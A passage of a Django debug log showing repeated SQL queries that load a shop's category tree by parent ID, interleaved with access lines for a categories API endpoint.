"shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 11:12:22,929 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 11:12:22,933 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 11:12:22,937 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 11:12:22,943 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 11:12:22,947 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 11:12:22,951 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 11:12:22,955 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 11:12:22,959 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 11:12:22,963 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 11:12:22,968 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 11:12:22,972 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 11:12:22,976 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 11:12:22,980 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 11:12:22,984 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 11:12:22] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 11:16:23,433 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 11:16:23,439 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 11:16:23,443 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 11:16:23,445 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 11:16:23,448 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 11:16:23,450 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 11:16:23,453 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 11:16:23,455 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 11:16:23,457 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 11:16:23,461 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 11:16:23,463 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 11:16:23,466 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 11:16:23,469 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 11:16:23,473 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 11:16:23,478 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 11:16:23,482 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 11:16:23,485 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 11:16:23,488 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 11:16:23,492 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 11:16:23,498 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 11:16:23,501 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 11:16:23,505 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 11:16:23,508 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 11:16:23,517 utils 4252 140031721535232 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 11:16:23,523 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 11:16:23,528 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 11:16:23,531 utils 4252 140031482124032 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-19 11:16:23,535 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 11:16:23,538 utils 4252 140031482124032 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 11:16:23,539 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 11:16:23,542 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) [19/Dec/2019 11:16:23] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-19 11:16:23,545 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 11:16:23,550 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 11:16:23,554 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 11:16:23,561 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 11:16:23,565 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 11:16:23,570 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 11:16:23,576 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 11:16:23,581 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 11:16:23,585 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 11:16:23,590 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 11:16:23,594 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 11:16:23,599 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 11:16:23,604 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 11:16:23,608 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 11:16:23,612 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 11:16:23,618 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 11:16:23,622 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 11:16:23] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 11:16:59] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 11:18:28,878 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 11:18:28,889 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 11:18:28,895 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 11:18:28,899 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 11:18:28,905 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", 